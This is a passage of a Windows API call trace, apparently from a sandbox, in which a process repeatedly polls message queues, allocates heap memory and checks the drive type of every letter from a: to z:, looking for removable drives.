[0214.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.727] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.728] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.728] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.728] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.728] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.728] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.728] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.728] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.728] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.728] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.728] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.728] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.729] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.729] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.729] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.729] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.729] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.730] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.730] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.730] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.730] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.731] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.731] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.731] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.731] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.731] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.731] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.732] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.732] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.732] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.733] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.733] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.734] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.734] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.734] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.734] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.734] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.734] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.734] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.734] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.734] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.734] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.735] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.735] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.735] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.735] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.735] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.735] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.736] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.736] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.736] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.736] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.736] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.736] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.736] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.737] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.737] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.737] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.737] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.737] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.737] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.738] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.738] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.738] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.738] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.739] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.739] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.739] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0214.778] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0214.778] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0214.778] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0214.778] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0214.778] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.778] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.779] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.779] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.779] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.779] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.779] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd358 [0214.779] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.779] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.779] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0214.779] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.779] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0214.779] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0214.779] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0214.779] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0214.779] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.779] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.779] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0214.779] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0214.780] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.780] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.780] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.780] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.780] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.780] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.780] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.780] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.780] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.781] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.781] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.781] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.782] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.782] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.782] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.782] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.782] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.782] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.783] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.783] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.783] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.783] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.783] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.784] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.784] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.784] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.784] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.784] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0214.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0214.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.785] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.785] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.785] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0214.785] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.785] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.785] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.785] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0214.785] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.785] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0214.785] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260a0 [0214.785] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0214.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260a0 | out: hHeap=0x12c0000) returned 1 [0214.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0214.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0214.786] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0214.786] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0214.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0214.786] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0214.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0214.786] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0214.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0214.786] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0214.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0214.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2b0 [0214.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0214.786] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0214.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.787] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0214.787] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0214.787] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0214.787] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.787] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0214.787] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0214.787] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0214.787] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0214.787] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.787] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.787] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.787] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.787] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.787] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.788] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.788] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.788] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.788] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.788] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.789] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.789] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.789] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.789] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.789] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.789] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.789] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.790] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.790] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.790] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.790] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.790] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.790] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.790] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.791] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.791] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0214.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0214.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0214.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0214.791] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.791] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0214.791] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0214.791] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.794] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0214.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.794] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.794] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0214.794] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.794] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0214.794] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f60 [0214.794] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.794] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f60 | out: hHeap=0x12c0000) returned 1 [0214.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0214.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0214.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e000 [0214.795] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e000 | out: hHeap=0x12c0000) returned 1 [0214.795] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0214.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0214.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0214.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0214.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.795] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0214.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0214.795] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0214.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318cc0 [0214.795] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318cc0 | out: hHeap=0x12c0000) returned 1 [0214.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0214.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0214.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.795] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0214.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0214.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0214.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0214.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 